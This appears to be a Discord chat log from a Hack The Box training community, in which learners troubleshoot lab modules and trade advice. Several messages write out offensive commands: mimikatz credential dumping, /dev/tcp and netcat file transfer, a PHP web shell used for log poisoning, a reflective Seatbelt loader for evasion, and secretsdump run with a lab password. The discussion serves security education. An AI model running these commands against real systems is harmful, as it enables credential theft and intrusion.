p a l y

r o b l o x

are you having a conversation with yourself?

I think this is a Convo for #general

0x00000002

ERROR_FILE_NOT_FOUND

The system cannot find the file specified.

file being lsass.dmp

yep

that's quite enough @atomic arch lol

Did he get banned

o7

doesn't look like it

muted more likely

as I saw a payloadbunny typing 👀

@cloud urchin just to make sure i'm understanding this right too; the minidump is reading from the file then subsequent commands related to it are trying to load from that file

yes

i don't recall needing to get lsass.dmp for mimikatz to dump passwords and such but I could be misremembering

yeah i never saved it specifically as something like that

Oh ya I didn’t specify the entire path for lsass.dmp I place it in x32 directory jn lmao

i generally just use this command

Thanks love being in this community

.\mimikatz.exe "log" "privilege::debug" "token::elevate" "lsadump::secrets" "sekurlsa::logonpasswords full" "lsadump::secrets" "lsadump::sam"

that section is specifically debug priv so it's slightly different

you have lsadump in there twice

I wanted to write that we should go back to the topic. You were quicker.

lol good catch

i'll edit that

i spend an unhealthy amount of time staring at screens

I can spot an error message or interesting info in a .5 second scroll

i should try multidump sometime

https://tenor.com/view/family-guy-stewie-griffin-my-god-i-really-do-have-problems-dont-i-i-have-problems-i-have-issues-gif-26433900

i do have that command in my notes though sekurlsa::minidump lsass.dmp

Has anyone here finished the new API Attacks module?

it could be he forgot to run mimikatz as admin this time, or mimikatz doesn't have permission to read from the folder it dumped to for some reason

Yes, a few people have worked through it

@atomic arch no need to whine in my DMs

sorry

for everthing

just straight dumping the lsass process might be easier

also you need to ask before dming people

it was user error

Please read the #rules

if you scroll up: "i didn't specify path, i saved it the the \win32 directory"

ahh yeah

missed that

gotta love windows errors 0x[error]

Can someone teach me how to hack using only the phone and is this possible?

I finished it but 1 question, Its not really clear if i should authenticate yes or no.

why do you have a grabifier link in your profile

Just for testing, I want to reach the hacking stage with all the information when entering the link, but I do not know how

testing what

the site

how does adding a grabifier link 'test the site'

seems more like you're trying to get ip addresses of people who click the link

Which section is this from?

API - ATTACKS : Unrestricted Resource Consumption

Yes, this is almost true, but I do not benefit from it. Simply knowing the addrres is not enough

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

you do know that trying to "reach the hacking stage" with other people's info is illegal and against the rules?

let them get a visit from the friendly FBI man

unfortunately US doesn't have an extradition treaty with algeria

doesn't mean they still won't get a visit

The module explains how you may be able to access data if you do not have a login

I modified it

Are there sites for creating links for hacking only when join it???

i don't think you know what you're asking about. this discord is for the hackthebox platform, which is a website for education

no

this has nothing to do with the academy. Please read the #rules

okay

hey

no

read #rules

Hi - where can i find machines/boxes related to a given module of cpts? - thx

the academy x HTB Labs section

however be warned: the boxes will generally not be the scope of whatever you just learned

or will often only partially have to deal with what you just learned

https://academy.hackthebox.com/academy-relations

my case in point: https://academy.hackthebox.com/academy-relations/modules/network-enumeration-with-nmap

Check this List from IppSec

https://www.youtube.com/playlist?list=PLidcsTyj9JXItWpbRtTg6aDEj10_F17x5

I was just looking at that, strangely enough. there's some hard boxes on that list. i hope i'm not expected to do all blindly haha

Don't be misled by the easy, medium and hard tags. Just because someone says that something is hard doesn't mean that you feel the same way.

yea agreed. i did some boxes over the past 2 days (hitting a wall of motivation for more modules), and i found PermX not that bad! but then I did another 'easy' box that i found far far harder...

only needed minimal nudges but definitely feel im far off CPTS lol.

In each of these videos, IppSec explains exactly how he proceeded. So it's definitely worth trying the box and watching the video afterwards. If you get stuck, you'll get tips on how to move forward. If you manage to complete the box, IppSec may show you another technique that you have never seen before.

yea good idea. i was looking at the list today as I was feeling a bit overwhelmed. the modules are great! and i found the vectors, but was unsure how to exploit what I knew needed to be done. for 1 of them, it was info from a module not in CPTS (from CBBH). As makes me think I should take a few other modules (i.e. the python course, though I already know some. Helps with some privesc. etc etc).

but you just answered a question I was wondering about. am i just meant to follow along with IppSec? Will definitely followthat advice. im months off taking the exam though.

also, almost every box ive done has included a lot of web based stuff. it feels like a weakness. will be circling back on those modules for sure, lol.

i find useful search the technique i want to explore by using ippsec website, even if i don't do the box, it is sometimes good to see a more informal way on a course topic https://ippsec.rocks/?#

ohhhh nice

follow along, i don't know, i find it more useful to try alone and if stuck too long, watch the vid to unlock a step then do alone... but even if i watch 1h30 video, i'll will often still struggle doing the box afterwards, it is not like watching is knowing how to do it. However it spoils the dopamine rush you get when you do it on your own : )

Could anybody assist me ,iam new to Hackthebox or even cybersecurity iam stuck at the question of " find out the machine hardware name".

could you try to give more context, which section, what have you tried, what you think the problem could be and that kind of stuff

yea definitely. ive also seen some walkthroughs which made zero sense and still couldnt do it. and it is a good feeling when you get it on your own. im looking forward to when i can completely do easy boxes without any nudge, haha. but watching others isnt bad. you get to see their method and hopefully understand it to include it next time.

usually you provide the Module and Section, so we understand the context.

The module box are on Linux fundamentals, it's the first question

yeah, that's hard to search google without finding sploilers for active boxes. And also those videos tend to give of false sense of speed, i mean what we see is a representation of the attack path, not the struggles, researches that leads to it. Even though ippsec videos have quite a lot of rabbit holes and mistakes which is nice to see, but still if it takes one week to do a box alone, that's what it is. Same for the blood time, when i see user flag like in 16minutes.. i'm still running a nmap scan and getting a coffee after 16mins... haha

have you tried the commands explained in the section?

hahaha yea. and for some of the exploits ive seen ... i've wodnered 'how tf did they figure that out' ... obviously hours of randomly searching but its not shown in walkthroughs. and i took PermX seriously. Took my time to enum everything, go over my notes. i'm finding the web stuff to be a weakness right now tbh.

the section goes through one of the commands. you need to use that command, and use the right flag. they mention the command/binary in the hint.

go up a bit more and have a look at what flags would give you the machine hardware. or type ||uname -h|| to see all options from the command line

yeah i find web kinda awful tbh, it is reassuring that it is a specialization. Doing the cpts path was nice until web, it was some dark place,,,, that part of the course felt different. Maybe I haven't just found yet a nice workflow. I even did windows privesc before it and i would have preferred to get deeper into windows attacks, but that's how it is.

thats where i am right now, im 75% complete of the path and within the web areas. up to attacking common apps. then its privesc. though its not needed for CPTS, i think i'll go do the remaining modules for CBBH. just because a web entry is so necessary for boxes, and boxes will help with CPTS prep.

oh, and i agree with workflow. i need to improve. modules are great but need to put it all together. need to find my own methodology and improve my processes.

how are you going? did you figure it out?

Awesome stuff, thanks man just in need of an mentor seriously

Iam just very much so much new to it

I've gotten prompt again

thats alright. its daunting. i thought i was alright but ive learned a tone over the past month. im even thinking of going back to do Linux Fundamentals even though i used it back in highschool (many many years ago).

was thinking about it as well, but from what i read here, it is overkill to use other techniques than those in the course. It could give more practice though. I was thinking about doing portswigger just to have a different view on the web-cpts topics. And common apps feels like a endless list of techniques, jumping to a thing then another, it was quite exhausting : D

mate, we are on the same wavelength hahaha. i also know it would be overkill, and i hear over and over again that you need to 'think dumber' for the exam (avoid those rabbit holes). but i feel like web is my weakness, which is also why i had been thinking about doing portswigger as well! But while it would be overkill, if it helps me practice on boxes more i think it'll be worth it (the CBBH modules not necessary portswigger but im very intersted in that too)

hahaha yea, i was pumped for it. but then i saw 4days and i feel like i might need more. as opposed to AD attacks that is 7 but i used 4days for that. the sections/content in common apps looks extensive.

HI! I got a q in regards to a box on academy. It is under the "Privilege Escalation" of the "Getting started" module

I am given credentials to login via ssh. I am logged in as user1, and I have to get to user2 & root. I am trying to get linpeas.sh, to scan for PrivEsc possibilities. I am trying to do that for the past 2h with netcat, but I cannot make it work

On my machine I run nc -v -l -p 54321 < /usr/share/peass/linpeas/linpeas.sh

On the box I run bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'

I am very, very sure that RHOST is set to my public ip and RPORT to 54321

Any ideas why it doesnt work? Is there a sort of block by my ISP?

why are you using netcat to transfer files? python3 -m http.server 8000 on your own box is a better option IMO. or you can use ssh file transfer, using the scp command.

Using it because that's what I found on GTFObins

you can just do nc <ip> <port> < linpeas.sh on client and nc -lvnp <port> > linpeas.sh on server

from a directory where you have linpeas.sh stored, run the above python command. then from the victim box run wget http://<YOUR IP>:8000/linpeas.sh

with nc after transfering it wont exit automatically you have to quit with ctrl c

yeah for me I decided I wasn't going deeper into web for now (or ever). Bug bounty, webapps are a thing in themselves, people just do that and that's a whole other world. For the common app, i found nice the modules about thick client, even made the module with ippsec technique of using eclipse, scripting, etc.

ah, right, GTFObins is good. the nc method looks like more effort than a http.server or scp attempt.

http.server is best but sometimes wget or curl wont be available in that cases you can just use nc

well, i was thinking of the bug/web pen route tbh. there is some potential work around in my field for that kind of skillset. though i find myself enjoying the more general CPTS type path than CWEE/CBBH

very true. i should practice the nc method tbh. im not confident with it as http.server is my go-to.

you said "RHOST is set to my public ip" , Did you set it to your vpn IP, tun0?

public ip, because the box is on a public ip too. For Academy's small boxes u dont need a vpn

that's what I was also wondering at a beginning, I know that for the rest of the boxes in lab u need a vpn

tried with python3, it still doesnt want to connect 😦

so by the looks of it, its not even reaching your own attack box. if it was, then you'd likely see a failed request from yuor http server

just sudo openvpn XD

even if you dont need a vpn for this, i would be running it anyway. i know for the exercises i did, i utilised the vpn connection (though for the XSS i had issues, which was either filtering from my ISP, or possibly my pi-hole/dns filter)

in all seriousness this seems like maybe a permission issue

permissions? how so?

sudo vs non

he's not connected to the VPN

sometimes when i use (example: vpn or http server) in order to run it and connect need sudo

you need sudo to utilise reserved ports. port 8000 is outside of that.

its just a thought

if there is ip:port vpn is not needed, but i wonder if you are supposed to transfer it, is linpeas not in a folder somewhere? can't even spawn the box at the moment

he's already said he's using his public IP so its not an issue.

though i think he should use his VPN and not public IP

nah some of the bodes are public so itsok to not vpn

thats something ive just learned, but still feels weird. i start the vpn when i start up my VM lol

yeah, same for the lab, academy apparently doesnt require it

well habbit ya

weird..

You need sudo to run OpenVPN but idk how that's related to this issue

so yeah, I got to user2 (from user1, so lateral movement)
but have no clue how to get to root. One idea was the linpeas.sh, but cannot get it to transfer it. Maybe I shouldnt transfer it altogheter and it's something much easier

i cant remember the specifics. but i usually do sudo -l soon after getting a shell

it will tell you what can be run as sudo, and hopefully its something that doesn't require a password, and even better if its on GTFObins with an exploit

exactly how I got the flag for user2!

/bin/bash into user2, didnt get asked for a passwd, got the flag

anybody willing to answer a question on https://academy.hackthebox.com/module/23/section/513 ((( Skills Assessment - File Inclusion ))) i got in i got to where you fuzz i got the access log i use burp.. and nothing i donno if i have enough or not enough ../ i have picture would like to pm so does not break rules pls ping me / reply so i know i got msg|

<?php system($_GET['cmd']); ?> it just ignores me

Why don’t you transfer the file via scp over your SSH connection?

honestly, so far im finding sudo -l incredibly useful. either that, or looking for SUID on root owned bins

will look into it

lineas shows you those things too ... haha

lineas not linpeas ?

nah, sorry, mistyped. linpeas

i wish i could get this fuzz question answered i got the answer cuz i looked itup the box itself WONT respond its driving me nuts

are you at the ||log poisoning|| part?

ist the very end skills assess

part of ||log poisoning|| is putting in that command into more than just the GET/POST headers. Something like ||user agent|| might be helpful to poison, then you should be able to use the php cmd shell.

in the actual setup ya i found the "log"| but burp wont do it

agan i know the answer i even know the walkthough can i shoot you a SS @sterile solstice

go for it

finished Windows Lateral Movement except for the broken section, gotta say the skills assessment is up there being the most frustrating/PITA sections I've done

hi i want to get started on htb but i don't have a linux machine availale currently and i can't download a remote one. other websites use a webshell, does htb use something like this? if so how do i connect?

HTB provides a PwnBox that you can use with your browser. You don't need your own Linux machine

Ah right but you only get a small time on the free plan, is there anything else?

i use Oracle VirtualBox and downloaded the recommended Parrot OS Security Edition

turns out i is not stoopid yay ^..^ i guess i just keep getting broken boxes

i having a problem with running a kernel exploit for 4.15.0-76-generic

all of are .sh scripts i found using searchexploit

but non of them are running properly

when i was doing the mod for general metasploit i had a similar issue and it turns out i was using the wrong exploit. might double check that make SURE you know what your using is right, then double check the vpn normally its the simple mistakes that screw ya over

tried everything correctly still not working

change vpn ,
get new box

ya auto mod is gonna keep removing that xD

try using ` marks

like this

bruh

i have done tis 2 times now i spent 12 hours working on a box got new vpn/box and was done in 1 min flat box was broken no error codes no sign of broken

just doday with file inclusion im doing it right but the box will not respond no matter what i do i double checked with another member even had him test it same deal. it happens.

its GREMLINS trust me they break dns and boxes

gl im going to bed

check your dms

hi so i downloaded ubuntu do i connect using openvpn from my virtual machine or my physical machine?

Bruh, no life ?

Why is it when I used bloodhound to check for machines and servers my user can RDP to, it doesn't show anything? I know my domain user can RDP to multiple machines but it doesn't show.

the worst is if its broken but you donno its broken.

i think there is a bug in Attacking Common Services - Medium box

i was able to get the flag in a way that feels unintended

Also, am I supposed to be getting a ton of "can't resolve" warnings when I run the collector for bloodhound?

or maybe it isnt really unintended but it makes the medium lab easier then the easy tbh

Is this ^ supposed to be normal when using a collector for bloodhound?

hey. i have a question about the introduction to windows evasion techniques.
i have been building the ps1 module however i still get the error displayed in the lesson. i can't really figure out why

function Invoke-Seatbelt {
[CmdletBinding()]
Param (
[String]
$args = " "
)

# Seatbelt.exe -> Gzip -> Base64

$gzipB64 = "<snip>"

Base64 decode

$gzipBytes = [Convert]::FromBase64String($gzipB64);

Gzip decompress

$gzipMemoryStream = New-Object IO.MemoryStream(, $gzipBytes);
$gzipStream = New-Object System.IO.Compression.GzipStream($gzipMemoryStream, [IO.Compression.CompressionMode]::Decompress);
$seatbeltMemoryStream = New-Object System.IO.MemoryStream;
$gzipStream.CopyTo($seatbeltMemoryStream);

Load assembly reflectively

$seatbeltArray = $seatbeltMemoryStream.ToArray();
$seatbelt = [System.Reflection.Assembly]::Load($seatbeltArray);

Redirect assembly STDOUT to console

$OldConsoleOut = Console::Out;
$StringWriter = New-Object IO.StringWriter;
Console::SetOut($StringWriter);

Call main method

[Seatbelt.Program]::Main($args.Split(" "));

Reset STDOUT

$Results = $StringWriter.ToString();
$Results;

}

Invoke-Seatbelt

here is my code, i don't understand why it will load but won't work

Hey ,it's Sonfire here. Just wanted to share some valuable knowledge and insights on what I had found valuable recently:

First: When wanting to get into Cyber security, think about why you want to get into it. It could be many different reasons, ranging from curiosity of what it really means to be a hacker, curiousity on how to hack and curiousity on how things work and how they can be exploited.

You see a pattern there don't you? It's "curiousity", curiousity is a valuable resource you are born with, something that drives humanity to keep thriving.
Who Invented Electricity? Someone who was curious, who invented the wheel, someone who was curious.
Curiousity is magic and you should always be curious.

In this field, curiousity is 1 of the two things you should grow on and expertise on. The other is ones own methodology. Where do you start and where do you go from there and continue combining the two, curiousity with your methodology to finalize the end result you wish to have.

2: You have the chance to save others, gain respect and grow your reputation. Reputation is built, but also can be destroyed. If one day you get a job, an employer will of course do some digging into your past and try to find everything you have done, Including the bad, and the good. Keep your plate clean. Don't eat a messy BBQ on a clean plate, there will be markings. Everything is traceable.

3: Dont let your ego get Infront of your true potential, your potential is what should always be grown, Infront of everything and ready to be used.

If you read this message, just a reminder, you are someone who was given life too, don't waste it, use it and keep using even when your goals are met. ❣️

👀

nevermind I am a moron

I tried running the SharpHound collector from a domain-joined windows workstation and got no such errors. It's just when I run the command from the Linux attack host provided.

sudo bloodhound-python -u '<username>' -p '<password>' -ns 172.16.7.3 -d inlanefreight.local -c all 

it seems, from the image your posted, you are trying all the machines in the inlanefreight.local domain. so you could try to specify the DC you want:
bloodhound-python -d INLANEFREIGHT.LOCAL -dc ACADEMY-EA-DC01 -c All -u <user> -p <password>

I want to collect data for the entire domain tho? There are no errors when I use SharpHound.exe. I'm currently checking to see if I can enumerate local admins from the data collected using SharpHound.

As for Linux, it's still throwing errors.

I just checked and I'm able to view which computers a user is local admin on, however, it's clear that the data isn't properly collected when using the Linux command I posted earlier 😕

Does the bloodhound-python collector just not work properly? Can someone test it out on the AD Enumeration & Attacks module > Skill Assessment Part II section and let me know if they're getting the "since it could not be resolved" error as well?

Also, separate question, which Inveigh should I be using?

it works the same here, but i got the files from bh. dont know if they are legit as i will not open BH now but it seems ok. ffs the whole thing is so laggy, if forgot it was possible

You didn't get any of the resolution errors?

i did get them

but first it says connecting to dc01 or something like that

So... you only got one resolution error? 🤨

no i got a lot

Ahh ok, so it's the same issue for you too.

seeing the list it seems that is just the fake computers in the domain database

those errors just mean the hosts exists in the domain records but cannot be reached

Here's the odd thing though. When I collect the data using the bloodhound-python collector from the Linux attack host provided and it throws those errors, I'm unable to enumerate local admins on workstations. Whereas, when I collect data using SharpHound on Windows, I'm able to do so.

maybe that's the reason:

So... it only works with the new docker version of bloodhound?

bh py should work even if some hosts can't be resolved

Local admin enumeration doesn't work 😢

I don't think any of the collectors checks that

no that's juste the page I was on

SharpHound does, I just tested.

So Bloodhound CE is the one that runs in docker?

yeah

it doens't always check, iirc it won't catch it a lot of times

Module: AD Enumeration & Attacks
Section: Skills Assessment Part II

This question is kind of a spoiler. I have not included any answers tho.

|| So in latter half of this assessment, we're required to run Inveigh from a workstation (SQL01) on which we've obtained local admin access in order to discover a user and their hash.

In the beginning of this assessment we had to run responder from the Linux attack host we were provided in order to discover the first domain user.

I don't get it, why didn't this other user show in the beginning? I'm assuming the workstation and the privilege with which we run Responder/Inveigh matters? ||

Ouhh, so it's better if we just manually enumerate the local admins on every workstation we compromise then?

sharphound has the option collection method LocalAdmin, and i checked bloodhound-python does as well, so you could try -c LocalAdmin from linux

Noted, I'll give that a shot now. Are we able to just upload the data from this command on top of the already uploaded data from the previous -all?

yeah always double check yourself, bh can and will miss things

Ouhh so it's known to miss things other than local admin as well, good to know.

Any idea about this @next bronze?

#modules message

That's my other question. Also, I get that LLMNR/NBT-NS Poisoning poisons the broadcast and captures the response and that's how it gets the hash. I just don't understand why the workstation we run it from or the level of privilege we use matters?

Okay, maybe I understand that privilege matters cuz it may limit some service functionality, but I don't get why the workstation I run it from matters if both workstations are on the same network.

Or is this a tool limitation case? Inveigh being able to do something responder is not and so it's able to capture the other user as well?

you mean the second capture? to capture a ntlm you need port 135/445 access which requires admin rights

Oh okay, so that's why I need admin privileges on the host. But why couldn't I capture the second hash when I originally ran Responder from the Linux attack host?

because it's a direct connection to that host, not your linux host

I am doing the AD asessement 1 and after the first pivot with ligolo the commands take forever to execute. Like I requested mimikatz to dump LSASS and I have been watching the CLI slowly render the text for longer than 10 minutes. Is this how it's supposed to be ?

To what host? I'm not following.

this -> #modules message

So... the second time, when I captured the request on MS01, it was a direct request, meaning there was no poisoning of a broadcast? So is it then recommended to run Inveigh/Responder on every host I compromise?

yep it's like when you captured someone tried to access a file on ms01

whether you want to try on every host is up to you

Understood, thanks! I don't wanna miss anything so def gonna have to make it a habit of runnning it first thing on every host

Btw in the module it says that the PowerShell version of Inveigh is no longer maintained and that the C# version (InveighZero) is the latest. It's fine to still use the PowerShell version tho, right? I checked the C# version, but not sure which to download

just use whatever works

Ok, thanks 😂

Does anyone else have issues connecting to some of the target machines that have specific port numbers? I use my own VM locally instead of the pwnbox, anyone know what's wrong? I saw something about Docker

still could not figure this out, any ideas ? I basically authenticated to host 1 , set up ligolo between it and attackbox, then psexec into another host in the domain, and every command I run through psexec takes ages to complete

oops missed this, psexec is slower yeah. a few ways you can solve it: send another revshell to yourself, transfer the lsass dump out and parse it in your own host, etc

that makes sense, thanks

any ideas why I cannot run this ?

RDP, psexec etc to the target works

i would try a higher timeout

SMB connection timeout (default: 2)```

Hello

thanks, this worked, also found a workaround with|| secretsdump.py svc_sql:lucky7@172.16.6.50|| which dumped similar info

.

anyone else have the web archives module broken

cpts^

Which module do you mean?

Hello everyone, I would like to ask. The first picture is from the textbook, and the second picture is a picture of the target drone, but there are no available updates. Can someone answer it for me? Thank you, about Drupal (Note: Location may differ based on the Drupal version and may be under the Extend menu.) He has this tip, but I still haven't found it

https://academy.hackthebox.com/module/144/section/1256 @acoustic owl

just try the first question without pwnbox - https://web.archive.org/ How many Pen Testing Labs did HackTheBox have on the 8th August 2018? Answer with an integer, eg 1234.

Check under 'status reports''

Another problem is that I wrote the PHP code, but it kept failing to save. Writing 12 worked.

Hackthebox.eu

HTB did not use .com back then 😉

thank you

I need help please. I am doing the File Upload Attacks Module, section: Blacklist Filters:
https://academy.hackthebox.com/module/136/section/1288
i get this error message while starting the attack with the intruder. I can't see the results to cotinue the section.

that message always comes if you are using community edition just click ok

I'm really sorry, I might be a little stupid, but I still didn't see it

alternatively you can use turbo intruder extension

Oh thanks. I am new to this sorry. My bad.

This is my status report

I still haven't found (+ Install new module button) where this place is，I'm really sorry.

https://www.drupal.org/project/drupal/issues/2672684

when you click on manage, then under that, there is another menu, click on extend

Thank you, this is a generated instance. I entered according to the path but didn't seem to find it.

I'm not connected to the drupal site, but I see that in my notes:
Once downloaded go to Administration > Reports > Available updates.
Note: Location may differ based on the Drupal version and may be under the Extend menu.

anyone else having this today? just loading and loading and nothing hapens. been like this for the past 1-2 hours.

@next bronze yoo , how was windows lateral movement ?

Try in a different browser?

its the same on my kali vm and on my host 🤔

i found it. you have to enable the Update Manager module and install it. Then refresh the page and you'll see at the top "No update information available", click on "check manually". Then you will get an Access denied, but clikc on Available Updates. Finally you get the page to upload the module.

refreshing the page might help.

😄

dopne that a cpuple of times

but i might have fixed it now

Oh?

not sure yet since its loding now again

it went back to normal and i started the target etc. so will wait a min to see if it really working

nope seems to be stuck again....

meh, I say it's B tier. the content is alright but the SA is a PITA

what module

weird thing is that i can start a target on a diff page on the same module (module im on is Intro to C2 Operations with Sliver)

ah rip that's the one t3 module that I'm not doing

Thank you, is that so?

okay , I had to start ADCS , I bought the module but didn't have time to read it

ADCS is a great module

lol

adcs is very good

one of the best imo

yeah I just need sometime to finish it

ADCS let me pwn my company in 5 mins

lol

ur company is so ruined then

name one that isn't lol

NOW IT WORKS

finally

In the "Footprinting Oracle TNS" module in the pentester job path - how am I supposed to understand that the user has elevated privileges (SYSDBS)? As far as I can tell, there's nothing that specifies it even after I log in as the user normally and it's just randomly trying to connect as "sysdba" and hoping it works. What am I missing here?

@feral nimbus also been facing the issue.

I do not see the same thing,,,

Sorry, I don't see no updates available

but that does not seem the same instance as before.
here is what i just did on the pwnbox

As far as I know oracle requires admin privileges. When you identify an app, you can do some research and maybe you can find interesting things, like that the user under he run need high priv.

Good

Thank you very much. Can I add you as a friend?

Sorry, maybe I'm not entirely understanding your response but that doesn't seem to do much with my question?

Thanks, this saves me a lot of detours

Here are the queries I ran - the first gives an output of "2" indicating that it failed to return any data, and the tw other queries return an error

These commands are as per the module itself, and I was able to log in as "sysdba" for the user "scott", but I'm not understanding how I could have possibly known that

sysdba isn't a user, it's a privilege

Here, the user scott has no administrative privileges. However, we can try using this account to log in as the System Database Admin (sysdba), giving us higher privileges.

As the text say... "we can try". 😀

Right, but how could I have known that the user has those privileges?

You can't know, as far as i know. You just can try and if it works, thats it. If not, you try something else.

you can simply try with the user you have access with. or you can view the list of users who have been granted sysdba via V$PWFILE_USERS

SELECT * FROM DBA_SYS_PRIVS WHERE PRIVILEGE = 'SYSDBA';
SELECT * FROM DBA_ROLE_PRIVS WHERE GRANTED_ROLE = 'SYSDBA';
``` i think any one of these can show it, at least according to chatgpt

That seems... odd at the very least? Especially considering the module specifically states that we could use the queries Ive used in my screenshot to check for elevated privileges for the user

Isn't that the third query I've used? You can see it in my screenshot.

how's that odd? many things you won't know until you've tried it

All three return the same error I've previously encountered:

That could just mean those views are not accessible with the privileges of the user context you're under

maybe try ```SELECT * FROM ALL_SYS_PRIVS WHERE GRANTEE = 'SCOTT';

or alternatively, just try it with the user you have compromised.

during the pentester path you will find many times that you just simple have to try / test things

Still no

are you in the correct database?

that contains that table?

https://stackoverflow.com/questions/16129912/sql-error-ora-00942-table-or-view-does-not-exist

Either the user doesn't have privileges needed to see the table, the table doesn't exist or you are running the query in the wrong schema

yeah ^ i said all that

Most probably you don't have the right priv

How can I verify this? I can use the following query to show all tables:
select table_name from all_tables;

To my understanding there's just one database and I've connected to one of it's instances using the SID I managed to brute-force

the sql fundamentals module would be great for this

https://dev.mysql.com/doc/refman/8.0/en/information-schema-schemata-table.html

this might work SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA;

that's for MySQL this is a oracle db

yeah he'd have to look it up then

he already has the answers though

Here's the Oracle DB equivalent: SELECT username AS schema_name FROM all_users;

bottom line is it's not like you're going to have a giant list of users that will take ages to check. maybe like 1-3 users at most and you can just check each one individually to see if they have privs

Thanks for helping. I'd assume that you could have hundreds of users to check which checking them all wouldn't be feasible at scale.

yeah i mean that'd be pretty crazy, but i don't think you'll encounter that on the htb platform

Anyone have issues with the NTLM Relay Attacks->NTLM Cross-protocol Relay Attacks: Use Responder to capture SMTP credentials. What is the cleartext password for the username 'smtptest'? I reverted the environment and still not having success.

just run responder and you should see it

use -v so it will show previoustly captured creds

That's what I thought, but how long does it take? I've let it run for 10+ min and still not showing (nor showing in the logs)

it should be pretty fast, let me check

Much appreciated. Knowing that it should be quick (and that it's not), I'm just gonna move on for now and try again another time. Thanks again.

took a couple of minutes but yeah it's there

Yeah, I'm still running responder and still hasn't come up... thx again for confirming should be within a few min, terminating the lab for now and will try again another time/day

Are you running responder on the right interface?

Could someone help on the getting started module, currently on the section where i have to find a public exploit however I'm stuck. I cannot gobuster the IP to get more information

What do you need gobuster for?

to find different directories

the exploit requires a path to get to flag.txt

however I don't know the path

Just visit the webpage in the browser dawg

^

Once you see it it becomes simple

unless I'm really stupid I don't see it

I understand theres an exploit for the Simple Backup plugin

searchsploit is giving me this txt file to look at - php/webapps/51937.txt

would i find this in my file system somewhere or in browser?

nvm, vpm issues

Use searchsploit -m 51937.txt

Alternatively, do it with msfconsole

It's on your system, the -m command copies it to your current directory

thank you, got the text file however it didn't lead me to much

Read it

You'll need to modify the command to suit your situation

okay so modify the command using metapsloit?

or modify the text file, I'm awful at code so this is a bit of a jamble for me

The text file contains a curl command to copy/paste

With msfconsole you just set a few options and it just works.tm

I apologise this is going over my head

I'm not seeing any curl command

The .txt file?

yeah

Hold on

Yeah it'll be simpler to use msfconsole

gotcha

there is 2 exploits for simple backup on exploit db, this is the other one https://www.exploit-db.com/exploits/39883

ah okay, are you able to explain what the WP-PATH bit is?

for downloading a backup file

It's the path to the WordPress portion of the site

Imo just use msfconsole

It'll be quicker and doesn't require extensive knowledge

It can be on web root (http://ip:port/)

In which case you skip that

i also vote for msfconsole

I've tried both ways

Currently getting the TARGETURI not validated error

if this is the getting started module I'm finished lmao

would hate to see how stuck I am on later modules

You don't change target URI

Also are you using the arbitrary file exploit or a different one

Also filepath needs to be changed

i mean there is much to say on each of your question. Just pause a bit and think, breathe i dont know : )
you enter target uri with port and then you specify port 80 on RPORT, that can't work

so should RPORT be the same port as the url port im guessing

RHOST; target IP
RPORT; target port {default 80}

any idea on what the filepath needs to be changed to? I understand I need to find the flag.txt file however I don't know the path for that

Yes you do

Read the question carefully

It explicitly tells you

😉

Anyone? D:

But also the URI is wrong

I changed the URI to /

I'm gonna be honest I didn't read this bc it's not formatted and I don't want to parse a wall of text

which was default

Ok

Now did you figure the filepath out?

@stark lark put ``` before and after your output

Forces it to be formatted in code block

Also makes it easier to read

oh wow

Yup usually I do that but forgot. One sec.

i am honestly an idiot

You also just pasted a wall of text with barely any info

I also didn't need to use perl

The smtp-user-enum script was ready to go on my machine with no problems

thank you so much for the help, serves me right for trying to jump straight in, I realised my config was set up wrong and didn't read the question carefully enough

you said "I understand I need to find the flag.txt file" ... that the whole problem : D

yeah, I'm just a bit slow i think haha

Always take a step back and look for the path of least resistance

If it looks complex, there's usually a simpler way

appreciate all the help, onto the next part of the module 🙂

tbh the msfconsole config was wrong which was just me being stupid, the filepath i just needed to read

The modules really mess with you if you don't read carefully

Attacking Common Services -> Easy Lab

I've tried the following for each port/service.

21/tcp   open  ftp
- hydra -L ../users.list -P ../passwords.list ftp://10.129.210.76 

25/tcp   open  smtp
- perl smtp-user-enum.pl -M RCPT -U ../users.list -D inlanefreight.htb -t 10.129.210.76
- hydra -L users.list -P password.list -f 10.129.210.76 smtp

sudo nmap -Pn -sV -sC -p25,143,110,465,587,993,995 10.129.210.76

80/443 tcp   open  http
- Enumerated the website and it found that the service should have multiple security misconfigurations/default passwords, none of which have worked for me.

587/tcp  open  submission
- perl smtp-user-enum.pl -M RCPT -U users.list -D inlanefreight.htb -t 10.129.203.7

3306/tcp open  mysql
- sudo nmap 10.129.210.76 -sV -sC -p3306 --script mysql*
- mysql -u root -h 10.129.203.7

3389/tcp open  ms-wbt-server
nmap -sV -sC 10.129.210.76 -p3389 --script rdp*```

Maybe I didn't need to call it this way but it works fine :-)

Increase the wait time for smtp

Will try that, because I suppose I should use the provided username dir list right?

Yes

Smtp can be slow to respond

It's not

Also spoiler

But that username is not in the provided list i believe

or I'm using the wrong one💀

It is, it's adding the email domain you goon

User@domain

Ftp will be your next step

Just remove the @domain

Heya, need some help with the first exercise of the skills assessment of the "using web proxies" module.

The first exercise is the following: The /lucky.php page has a button that appears to be disabled. Try to enable the button, and then click it to get the flag.

I have enabled the button, and upon clicking it it sends a packet with a couple headers and the following data: getflag=true
when i pass this it returns the /lucky.php page again and doesn't give me a flag. what am i doing wrong?

Hey any assistance on how to run module machine on my Linux machine

haven't done this module but my initial thought is to intercept the server response and see if it's returning the flag before redirecting to lucky.php

nope. server response is the exact same as what you would get from reloading the page.

<html lang="en">

<head>
    <meta charset="UTF-8">
    <title>I'm feeling lucky!</title>
    <link rel="stylesheet" href="./style.css">
</head>

<body>
    <form name='getflag' class='form' method='post' id='form1'>
        <button class='btn block-cube block-cube-hover' id='submit' type='submit' formmethod='post' name='getflag' value='true' disabled>
            <div class='bg-top'>
                <div class='bg-inner'></div>
            </div>
            <div class='bg-right'>
                <div class='bg-inner'></div>
            </div>
            <div class='bg'>
                <div class='bg-inner'></div>
            </div>
            <div class='text'>
                Click for a chance to win a flag!
            </div>
        </button>
    </form>
</body>

</html>```

this is what i recieve back from the server

with the button disabled again ^^

once you get the button enabled, turn on burpsuite intercept, then click the button and send to Repeater. Then you'll be able to send the request over and over as many times as you need, without having to enable the button every time

oh so i guess the "lucky.php" thing actually refers to it needing luck? lol

yeah. i just enabled the button and spammed it a bunch to get the flag.

lmao okay, thanks

Try to put code in code blocks

3 backticks ```

ah. i was confused why a single backtick wasn't working. thanks

